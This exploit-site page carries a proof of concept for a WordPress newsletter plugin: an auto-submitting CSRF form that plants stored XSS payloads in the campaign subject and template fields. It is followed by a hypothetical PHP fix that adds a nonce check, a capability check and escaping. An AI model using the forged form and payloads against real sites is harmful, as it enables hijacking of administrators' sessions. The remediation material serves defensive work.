## https://sploitus.com/exploit?id=WPEX-ID:FC33C79D-AD24-4D55-973A-25280995A2AB
Make an admin open an HTML file containing:
```
<body onload="document.forms[0].submit()">
<form action="http://localhost:10019/wp-admin/admin.php?page=enl-add-new" method="post">
<input type="hidden" name="action" value="create" />
<input type="hidden" name="number" value="5" />
<label for="name">Name:</label>
<input type="text" id="name" name="name" value="CSRF"/>
<input type="hidden" name="subject" value='"><script>alert(1)</script>' />
<input type="hidden" name="header" value="CSRF!" />
<input type="hidden" name="template" value='</textarea><script>alert(2)</script>' />
<input type="hidden" name="footer" value="CSRF" />
<input type="hidden" name="campaign" value="Save" />
<input type="submit" value="Submit" />
</form>
</body>
```
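The form above works because the request is accepted without a per-user token, and the `subject` and `template` payloads are shaped to break out of an attribute value and a `<textarea>`. The following is an added example, not the plugin's own code: a hypothetical handler and view for the same field names showing the nonce check and context-specific escaping that stop both steps. The `enl_demo_*` function names, the nonce action and field, the option name and the `manage_options` capability are assumptions.

```php
<?php
// Hypothetical handler and view for the fields the PoC posts; not the plugin's code.
// Assumed names: enl_demo_* functions, nonce 'enl_demo_create' / 'enl_demo_nonce',
// option 'enl_demo_campaign', capability 'manage_options'.

// Inside the admin form, emit a token a forged cross-site page cannot know:
//   wp_nonce_field( 'enl_demo_create', 'enl_demo_nonce' );

function enl_demo_handle_create() {
    if ( ! isset( $_POST['action'] ) || 'create' !== $_POST['action'] ) {
        return;
    }
    // Authorisation: only users allowed to manage the site may create campaigns.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }
    // CSRF: terminates the request when the nonce is missing or invalid,
    // which is the case for the auto-submitting form shown above.
    check_admin_referer( 'enl_demo_create', 'enl_demo_nonce' );

    $post     = wp_unslash( $_POST );
    $campaign = array(
        'number'   => isset( $post['number'] ) ? absint( $post['number'] ) : 0,
        'name'     => sanitize_text_field( $post['name'] ?? '' ),
        'subject'  => sanitize_text_field( $post['subject'] ?? '' ),
        // Newsletter bodies may need markup: keep only the tags WordPress allows in posts.
        'header'   => wp_kses_post( $post['header'] ?? '' ),
        'template' => wp_kses_post( $post['template'] ?? '' ),
        'footer'   => wp_kses_post( $post['footer'] ?? '' ),
    );
    update_option( 'enl_demo_campaign', $campaign );
}
add_action( 'admin_init', 'enl_demo_handle_create' );

function enl_demo_render_fields() {
    $c = get_option( 'enl_demo_campaign', array() );
    // esc_attr() encodes the quote and angle brackets of '"><script>...' so the
    // value cannot leave the attribute.
    printf( '<input type="text" name="subject" value="%s" />', esc_attr( $c['subject'] ?? '' ) );
    // esc_textarea() encodes '</textarea><script>...' so it stays inside the textarea.
    printf( '<textarea name="template">%s</textarea>', esc_textarea( $c['template'] ?? '' ) );
}
```

Escaping at output is needed even with the input filters in place, since values already stored before a fix would otherwise still render unescaped.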